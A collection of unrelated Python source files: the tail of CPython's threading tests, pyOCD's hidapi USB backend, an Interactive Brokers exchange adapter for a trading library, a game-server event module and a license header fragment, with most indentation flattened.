self.assertFalse(ident[0] is None)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print 'with 256kB thread stack size...'
try:
threading.stack_size(262144)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print 'with 1MB thread stack size...'
try:
threading.stack_size(0x100000)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
try:
import ctypes
except ImportError:
if verbose:
print "test_PyThreadState_SetAsyncExc can't import ctypes"
return # can't do anything
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
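        # set_async_exc(thread_id, exc_object) schedules exc_object to be raised
        # asynchronously in the thread with the given id and returns the number
        # of thread states that were modified.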
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = thread.get_ident()
try:
result = set_async_exc(ctypes.c_long(tid), exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = thread.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print " started worker thread"
# Try a thread id that doesn't make sense.
if verbose:
print " trying nonsensical thread id"
result = set_async_exc(ctypes.c_long(-1), exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print " waiting for worker thread to get started"
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print " verifying worker hasn't exited"
self.assertTrue(not t.finished)
if verbose:
print " attempting to raise asynch exception in worker"
result = set_async_exc(ctypes.c_long(t.id), exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print " waiting for worker to say it caught the exception"
worker_saw_exception.wait(timeout=10)
self.assertTrue(t.finished)
if verbose:
print " all OK -- joining worker"
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise thread.error()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(thread.error, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
try:
import ctypes
except ImportError:
if verbose:
print("test_finalize_with_runnning_thread can't import ctypes")
return # can't do anything
rc = subprocess.call([sys.executable, "-c", """if 1:
import ctypes, sys, time, thread
# This lock is used as a simple event variable.
ready = thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
"""])
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print 'program blocked; aborting'
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
"""],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
stdout, stderr = p.communicate()
rc = p.returncode
        self.assertFalse(rc == 2, "interpreter was blocked")
self.assertTrue(rc == 0,
"Unexpected error: " + repr(stderr))
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
p = subprocess.Popen([sys.executable, "-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print "Woke up, sleep function is:", sleep
threading.Thread(target=child).start()
raise SystemExit
"""],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
stdout, stderr = p.communicate()
self.assertEqual(stdout.strip(),
"Woke up, sleep function is: <built-in function sleep>")
        stderr = re.sub(r"^\[\d+ refs\]", "", stderr, flags=re.MULTILINE).strip()
self.assertEqual(stderr, "")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getcheckinterval()
try:
for i in xrange(1, 100):
# Try a couple times at each thread-switching interval
# to get more interleavings.
sys.setcheckinterval(i // 5)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setcheckinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertEqual(None, weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertEqual(None, weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
class ThreadJoinOnShutdown(BaseTestCase):
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('freebsd4', 'freebsd5', 'freebsd6', 'netbsd5',
'os2emx')
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print 'end of thread'
\n""" + script
p = subprocess.Popen([sys.executable, "-c", script], stdout=subprocess.PIPE)
rc = p.wait()
data = p.stdout.read().replace('\r', '')
p.stdout.close()
self.assertEqual(data, "end of main\nend of thread\n")
self.assertFalse(rc == 2, "interpreter was blocked")
self.assertTrue(rc == 0, "Unexpected error")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print 'end of main'
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print 'end of main'
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print 'end of main'
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
def assertScriptHasOutput(self, script, expected_output):
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE)
rc = p.wait()
data = p.stdout.read().decode().replace('\r', '')
self.assertEqual(rc, 0, "Unexpected error")
self.assertEqual(data, expected_output)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_joining_across_fork_in_worker_thread(self):
# There used to be a possible deadlock when forking from a child
# thread. See http://bugs.python.org/issue6643.
# The script takes the following steps:
# - The main thread in the parent process starts a new thread and then
# tries to join it.
# - The join operation acquires the Lock inside the thread's _block
# Condition. (See threading.py:Thread.join().)
# - We stub out the acquire method on the condition to force it to wait
# until the child thread forks. (See LOCK ACQUIRED HERE)
# - The child thread forks. (See LOCK HELD and WORKER THREAD FORKS
# HERE)
# - The main thread of the parent process enters Condition.wait(),
# which releases the lock on the child thread.
# - The child process returns. Without the necessary fix, when the
# main thread of the child process (which used to be the child thread
# in the parent process) attempts to exit, it will try to acquire the
# lock in the Thread._block Condition object and hang, because the
# lock was held across the fork.
script = """if 1:
import os, time, threading
finish_join = False
start_fork = False
def worker():
# Wait until this thread's lock is acquired before forking to
# create the deadlock.
global finish_join
while not start_fork:
time.sleep(0.01)
# LOCK HELD: Main thread holds lock across this call.
childpid = os.fork()
finish_join = True
if childpid != 0:
# Parent process just waits for child.
os.waitpid(childpid, 0)
# Child process should just return.
w = threading.Thread(target=worker)
# Stub out the private condition variable's lock acquire method.
# This acquires the lock and then waits until the child has forked
# before returning, which will release the lock soon after. If
# someone else tries to fix this test case by acquiring this lock
# before forking instead of resetting it, the test case will
# deadlock when it shouldn't.
condition = w._block
orig_acquire = condition.acquire
call_count_lock = threading.Lock()
call_count = 0
def my_acquire():
global call_count
global start_fork
orig_acquire() # LOCK ACQUIRED HERE
start_fork = True
if call_count == 0:
while not finish_join:
time.sleep(0.01) # WORKER THREAD FORKS HERE
with call_count_lock:
call_count += 1
condition.acquire = my_acquire
w.start()
w.join()
print('end of main')
"""
self.assertScriptHasOutput(script, "end of main\n")
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_5_clear_waiter_locks_to_avoid_crash(self):
# Check that a spawned thread that forks doesn't segfault on certain
# platforms, namely OS X. This used to happen if there was a waiter
# lock in the thread's condition variable's waiters list. Even though
# we know the lock will be held across the fork, it is not safe to
# release locks held across forks on all platforms, so releasing the
# waiter lock caused a segfault on OS X. Furthermore, since locks on
# OS X are (as of this writing) implemented with a mutex + condition
# variable instead of a semaphore, while we know that the Python-level
# lock will be acquired, we can't know if the internal mutex will be
# acquired at the time of the fork.
script = """if True:
import os, time, threading
start_fork = False
def worker():
# Wait until the main thread has attempted to join this thread
# before continuing.
while not start_fork:
time.sleep(0.01)
childpid = os.fork()
if childpid != 0:
# Parent process just waits for child.
(cpid, rc) = os.waitpid(childpid, 0)
assert cpid == childpid
assert rc == 0
print('end of worker thread')
else:
# Child process should just return.
pass
w = threading.Thread(target=worker)
# Stub out the private condition variable's _release_save method.
# This releases the condition's lock and flips the global that
# causes the worker to fork. At this point, the problematic waiter
# lock has been acquired once by the waiter and has been put onto
# the waiters list.
condition = w._block
orig_release_save = condition._release_save
def my_release_save():
global start_fork
orig_release_save()
# Waiter lock held here, condition lock released.
start_fork = True
condition._release_save = my_release_save
w.start()
w.join()
print('end of main thread')
"""
output = "end of worker thread\nend of main thread\n"
self.assertScriptHasOutput(script, output)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
os.waitpid(pid, 0)
else:
os._exit(0)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
def test_joining_current_thread(self):
current_thread = threading.current_thread()
        self.assertRaises(RuntimeError, current_thread.join)
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class RLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading.RLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
    # A Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
@unittest.skipUnless(sys.platform == 'darwin', 'test macosx problem')
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RuntimeError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error")
self.assertEqual(data, expected_output)
def test_main():
test.test_support.run_unittest(LockTests, RLockTests, EventTests,
ConditionAsRLockTests, ConditionTests,
SemaphoreTests, BoundedSemaphoreTests,
ThreadTests,
ThreadJoinOnShutdown,
ThreadingExceptionTests,
)
if __name__ == "__main__":
test_main()
|
hidapi_backend.py
|
# pyOCD debugger
# Copyright (c) 2006-2020 Arm Limited
# Copyright (c) 2021-2022 Chris Reed
# Copyright (c) 2022 Harper Weigle
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import logging
import platform
import six
import threading
from .interface import Interface
from .common import (
filter_device_by_usage_page,
generate_device_unique_id,
is_known_cmsis_dap_vid_pid,
)
from ..dap_access_api import DAPAccessIntf
from ....utility.compatibility import to_str_safe
from ....utility.timeout import Timeout
LOG = logging.getLogger(__name__)
TRACE = LOG.getChild("trace")
TRACE.setLevel(logging.CRITICAL)
try:
import hid
except ImportError:
IS_AVAILABLE = False
else:
IS_AVAILABLE = True
# OS flags.
_IS_DARWIN = (platform.system() == 'Darwin')
_IS_WINDOWS = (platform.system() == 'Windows')
class HidApiUSB(Interface):
"""@brief CMSIS-DAP USB interface class using hidapi backend."""
isAvailable = IS_AVAILABLE
HIDAPI_MAX_PACKET_COUNT = 30
def __init__(self, dev, info: dict):
super().__init__()
# Vendor page and usage_id = 2
self.vid = info['vendor_id']
self.pid = info['product_id']
self.vendor_name = info['manufacturer_string'] or f"{self.vid:#06x}"
self.product_name = info['product_string'] or f"{self.pid:#06x}"
self.serial_number = info['serial_number'] \
or generate_device_unique_id(self.vid, self.pid, six.ensure_str(info['path']))
self.device_info = info
self.device = dev
self.thread = None
self.read_sem = threading.Semaphore(0)
self.closed_event = threading.Event()
self.received_data = collections.deque()
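        # Read protocol on non-Windows hosts: write() releases read_sem once per
        # expected response, rx_task() blocks on the semaphore, reads one packet
        # and appends it to received_data, and close() sets closed_event and
        # releases the semaphore one last time so the thread can exit.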
def set_packet_count(self, count):
# hidapi for macos has an arbitrary limit on the number of packets it will queue for reading.
# Even though we have a read thread, it doesn't hurt to limit the packet count since the limit
# is fairly high.
if _IS_DARWIN:
count = min(count, self.HIDAPI_MAX_PACKET_COUNT)
self.packet_count = count
def open(self):
try:
self.device.open_path(self.device_info['path'])
except IOError as exc:
raise DAPAccessIntf.DeviceError("Unable to open device: " + str(exc)) from exc
# Windows does not use the receive thread because it causes packet corruption for some reason.
if not _IS_WINDOWS:
# Make certain the closed event is clear.
self.closed_event.clear()
# Start RX thread
self.thread = threading.Thread(target=self.rx_task)
self.thread.daemon = True
self.thread.start()
def rx_task(self):
try:
while not self.closed_event.is_set():
self.read_sem.acquire()
if not self.closed_event.is_set():
read_data = self.device.read(self.packet_size)
if TRACE.isEnabledFor(logging.DEBUG):
# Strip off trailing zero bytes to reduce clutter.
TRACE.debug(" USB IN < (%d) %s", len(read_data), ' '.join([f'{i:02x}' for i in bytes(read_data).rstrip(b'\x00')]))
self.received_data.append(read_data)
finally:
# Set last element of rcv_data to None on exit
self.received_data.append(None)
@staticmethod
def get_all_connected_interfaces():
"""@brief Returns all the connected devices with CMSIS-DAP in the name.
returns an array of HidApiUSB (Interface) objects
"""
devices = hid.enumerate()
boards = []
for deviceInfo in devices:
product_name = to_str_safe(deviceInfo['product_string'])
known_cmsis_dap = is_known_cmsis_dap_vid_pid(deviceInfo['vendor_id'], deviceInfo['product_id'])
if ("CMSIS-DAP" not in product_name) and (not known_cmsis_dap):
# Check the device path as a backup. Even though we can't get the interface name from
# hidapi, it may appear in the path. At least, it does on macOS.
device_path = to_str_safe(deviceInfo['path'])
if "CMSIS-DAP" not in device_path:
# Skip non cmsis-dap devices
continue
vid = deviceInfo['vendor_id']
pid = deviceInfo['product_id']
# Perform device-specific filtering.
if filter_device_by_usage_page(vid, pid, deviceInfo['usage_page']):
continue
try:
dev = hid.device(vendor_id=vid, product_id=pid, path=deviceInfo['path'])
except IOError as exc:
LOG.debug("Failed to open USB device: %s", exc)
continue
# Create the USB interface object for this device.
new_board = HidApiUSB(dev, deviceInfo)
boards.append(new_board)
return boards
def write(self, data):
"""@brief Write data on the OUT endpoint associated to the HID interface"""
if TRACE.isEnabledFor(logging.DEBUG):
TRACE.debug(" USB OUT> (%d) %s", len(data), ' '.join([f'{i:02x}' for i in data]))
data.extend([0] * (self.packet_size - len(data)))
if not _IS_WINDOWS:
self.read_sem.release()
self.device.write([0] + data)
def read(self):
"""@brief Read data on the IN endpoint associated to the HID interface"""
# Windows doesn't use the read thread, so read directly.
if _IS_WINDOWS:
read_data = self.device.read(self.packet_size)
if TRACE.isEnabledFor(logging.DEBUG):
# Strip off trailing zero bytes to reduce clutter.
TRACE.debug(" USB IN < (%d) %s", len(read_data), ' '.join([f'{i:02x}' for i in bytes(read_data).rstrip(b'\x00')]))
return read_data
# Other OSes use the read thread, so we check for and pull data from the queue.
        # Spin for a while if there's no data available yet, sleeping 100 µs between checks.
with Timeout(self.DEFAULT_USB_TIMEOUT_S, sleeptime=0.0001) as t_o:
while t_o.check():
if len(self.received_data) != 0:
break
else:
raise DAPAccessIntf.DeviceError(f"Timeout reading from device {self.serial_number}")
if self.received_data[0] is None:
raise DAPAccessIntf.DeviceError(f"Device {self.serial_number} read thread exited")
# Trace when the higher layer actually gets a packet previously read.
if TRACE.isEnabledFor(logging.DEBUG):
# Strip off trailing zero bytes to reduce clutter.
TRACE.debug(" USB RD < (%d) %s", len(self.received_data[0]),
' '.join([f'{i:02x}' for i in bytes(self.received_data[0]).rstrip(b'\x00')]))
return self.received_data.popleft()
def close(self):
"""@brief Close the interface"""
assert not self.closed_event.is_set()
LOG.debug("closing interface")
if not _IS_WINDOWS:
self.closed_event.set()
self.read_sem.release()
self.thread.join()
self.thread = None
            # Clear the closed event, and recreate the read semaphore and received-data
            # deque so they are reset and ready if we're re-opened.
self.closed_event.clear()
self.read_sem = threading.Semaphore(0)
self.received_data = collections.deque()
self.device.close()
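
# Hedged usage sketch (illustrative only, not part of the original backend): how a
# caller might enumerate CMSIS-DAP probes and exchange a single packet through this
# interface. The 64-byte report size and the DAP_Info request bytes (0x00, 0x01 =
# vendor name) are assumptions for illustration; real clients drive this class
# through the higher-level DAPAccess layer instead of calling it directly.
if __name__ == "__main__":
    probes = HidApiUSB.get_all_connected_interfaces()
    if probes:
        probe = probes[0]
        probe.packet_size = 64      # assumed HID report payload size
        probe.set_packet_count(4)
        probe.open()
        try:
            probe.write([0x00, 0x01])           # DAP_Info: request vendor name
            response = probe.read()
            print(probe.vendor_name, probe.product_name, bytes(response[:8]).hex())
        finally:
            probe.close()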
|
ib.py
|
import asyncio
import threading
from queue import Queue
from random import randint
from ibapi.client import EClient # type: ignore
from ibapi.wrapper import EWrapper # type: ignore
from ibapi.order import Order # type: ignore
from aat.exchange import Exchange
from aat.config import EventType, TradingType
from aat.core import ExchangeType, Event, Trade
from .utils import _constructContract, _constructContractAndOrder, _constructInstrument
class _API(EWrapper, EClient):
def __init__(self, order_event_queue, market_data_queue, contract_info_queue):
EClient.__init__(self, self)
self.nextOrderId = None
self.nextReqId = 1
self._order_event_queue = order_event_queue
self._market_data_queue = market_data_queue
self._contract_info_queue = contract_info_queue
def nextValidId(self, orderId: int):
super().nextValidId(orderId)
self.nextOrderId = orderId
def reqContractDetails(self, contract):
super().reqContractDetails(self.nextReqId, contract)
self.nextReqId += 1
def placeOrder(self, contract, order):
super().placeOrder(self.nextOrderId, contract, order)
self.nextOrderId += 1
return self.nextOrderId - 1
def contractDetails(self, reqId, contractDetails):
self._contract_info_queue.put(contractDetails)
def orderStatus(self, orderId, status, filled, remaining, avgFillPrice, permId, parentId, lastFillPrice, clientId, whyHeld, mktCapPrice):
self._order_event_queue.put(dict(orderId=orderId,
status=status,
filled=filled,
remaining=remaining,
avgFillPrice=avgFillPrice,
permId=permId,
parentId=parentId,
lastFillPrice=lastFillPrice,
clientId=clientId,
whyHeld=whyHeld,
mktCapPrice=mktCapPrice))
class InteractiveBrokersExchange(Exchange):
'''Interactive Brokers Exchange'''
def __init__(self, trading_type, verbose, **kwargs):
self._trading_type = trading_type
self._verbose = verbose
if self._trading_type == TradingType.LIVE:
super().__init__(ExchangeType('interactivebrokers'))
else:
super().__init__(ExchangeType('interactivebrokerspaper'))
# map order.id to order
self._orders = {}
# IB TWS gateway
self._order_event_queue = Queue()
self._market_data_queue = Queue()
self._contract_lookup_queue = Queue()
self._api = _API(self._order_event_queue, self._market_data_queue, self._contract_lookup_queue)
# *************** #
# General methods #
# *************** #
async def instruments(self):
'''get list of available instruments'''
return []
async def connect(self):
'''connect to exchange. should be asynchronous.
For OrderEntry-only, can just return None
'''
if self._trading_type == TradingType.LIVE:
self._api.connect('127.0.0.1', 7496, randint(0, 10000))
raise NotImplementedError()
else:
self._api.connect('127.0.0.1', 7497, randint(0, 10000))
self._api_thread = threading.Thread(target=self._api.run, daemon=True)
self._api_thread.start()
while self._api.nextOrderId is None:
print('waiting for IB connect...')
await asyncio.sleep(1)
print('IB connected!')
async def lookup(self, instrument):
self._api.reqContractDetails(_constructContract(instrument))
i = 0
while i < 5:
if self._contract_lookup_queue.qsize() > 0:
ret = []
while self._contract_lookup_queue.qsize() > 0:
contract_details = self._contract_lookup_queue.get()
ret.append(_constructInstrument(contract_details.contract))
return ret
else:
await asyncio.sleep(1)
i += 1
# ******************* #
# Market Data Methods #
# ******************* #
async def tick(self):
'''return data from exchange'''
while True:
# clear order events
while self._order_event_queue.qsize() > 0:
order_data = self._order_event_queue.get()
status = order_data['status']
order = self._orders[order_data['orderId']]
if status in ('ApiPending', 'PendingSubmit', 'PendingCancel', 'PreSubmitted', 'ApiCancelled', 'Inactive'):
# ignore
continue
elif status in ('Submitted',):
# TODO more granular order events api?
# ignore
pass
elif status in ('Cancelled',):
e = Event(type=EventType.REJECTED, target=order)
yield e
elif status in ('Filled',):
t = Trade(volume=order_data['filled'], price=order_data['avgFillPrice'], maker_orders=[], taker_order=order)
t.my_order = order
e = Event(type=EventType.TRADE, target=t)
yield e
await asyncio.sleep(0)
# clear market data events
# TODO
# ******************* #
# Order Entry Methods #
# ******************* #
async def accounts(self):
'''get accounts from source'''
return []
async def newOrder(self, order):
'''submit a new order to the exchange. should set the given order's `id` field to exchange-assigned id
For MarketData-only, can just return None
'''
# construct IB contract and order
ibcontract, iborder = _constructContractAndOrder(order)
# send to IB
id = self._api.placeOrder(ibcontract, iborder)
# update order id
order.id = id
self._orders[order.id] = order
async def cancelOrder(self, order: Order):
'''cancel a previously submitted order to the exchange.
For MarketData-only, can just return None
'''
self._api.cancelOrder(order.id)
Exchange.registerExchange('ib', InteractiveBrokersExchange)
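
# Hedged usage sketch (illustrative only, not part of aat): connect to a locally
# running TWS / IB Gateway *paper* instance on 127.0.0.1:7497 and report the first
# usable order id. Any non-LIVE TradingType member selects the paper port; reading
# the private `_api.nextOrderId` is done here purely for demonstration.
async def _demo_connect():
    paper_mode = next(t for t in TradingType if t is not TradingType.LIVE)
    exchange = InteractiveBrokersExchange(paper_mode, verbose=False)
    await exchange.connect()
    print('connected, next order id:', exchange._api.nextOrderId)

if __name__ == "__main__":
    asyncio.run(_demo_connect())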
|
event.py
|
import time
import threading
from modules.base_module import Module
class_name = "Event"
class Event(Module):
prefix = "ev"
def __init__(self, server):
self.server = server
self.commands = {"get": self.get_events, "gse": self.get_self_event,
"crt": self.create_event,
"cse": self.close_self_event,
"evi": self.get_event_info}
self.events = {}
thread = threading.Thread(target=self._background)
thread.daemon = True
thread.start()
def get_events(self, msg, client):
evts = []
for uid in self.events:
apprnc = self.server.get_appearance(uid)
if not apprnc:
continue
evts.append(self._get_event(uid))
client.send(["ev.get", {"c": -1, "tg": "", "evlst": evts}])
def get_self_event(self, msg, client):
if client.uid not in self.events:
return client.send(["ev.gse", {}])
        client.send(["ev.gse", {"ev": self._get_event(client.uid)}])
def create_event(self, msg, client):
if client.uid in self.events:
return
ev = msg[2]["ev"]
duration = int(msg[2]["evdrid"].split("eventDuration")[1])
if ev["r"] > 13 or ev["c"] == 3:
user_data = self.server.get_user_data(client.uid)
privileges = self.server.modules["cp"].privileges
if user_data["role"] < privileges["CREATE_MODERATOR_EVENT"]:
return
event = {"name": ev["tt"], "description": ev["ds"],
"start": int(time.time()), "uid": client.uid,
"finish": int(time.time()+duration*60),
"min_lvl": ev["ml"], "category": ev["c"], "active": ev["ac"],
"rating": ev["r"]}
if not ev["l"]:
event["location"] = "livingroom"
else:
event["location"] = ev["l"]
self.events[client.uid] = event
user_data = self.server.get_user_data(client.uid)
client.send(["ev.crt", {"ev": self._get_event(client.uid),
"res": {"gld": user_data["gld"],
"slvr": user_data["slvr"],
"enrg": user_data["enrg"],
"emd": user_data["emd"]},
"evtg": []}])
def close_self_event(self, msg, client):
if client.uid not in self.events:
return
del self.events[client.uid]
client.send(["ev.cse", {}])
def get_event_info(self, msg, client):
id_ = str(msg[2]["id"])
if id_ not in self.events:
return
event = self._get_event(id_)
apprnc = self.server.get_appearance(id_)
clths = self.server.get_clothes(id_, type_=2)
client.send(["ev.evi", {"ev": event,
"plr": {"uid": id_, "apprnc": apprnc,
"clths": clths},
"id": int(id_)}])
def _get_event(self, uid):
event = self.events[uid]
apprnc = self.server.get_appearance(uid)
type_ = 0 if event["location"] == "livingroom" else 1
return {"tt": event["name"], "ds": event["description"],
"st": event["start"], "ft": event["finish"], "uid": uid,
"l": event["location"], "id": int(uid), "unm": apprnc["n"],
"ac": event["active"], "c": event["category"],
"ci": 0, "fo": False, "r": event["rating"], "lg": 30,
"tp": type_, "ml": event["min_lvl"]}
def _background(self):
while True:
for uid in self.events.copy():
if time.time() - self.events[uid]["finish"] > 0:
del self.events[uid]
time.sleep(60)
|
_base.py
|
# Copyright (c) 2015-2020, Swiss Federal Institute of Technology (ETH Zurich)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
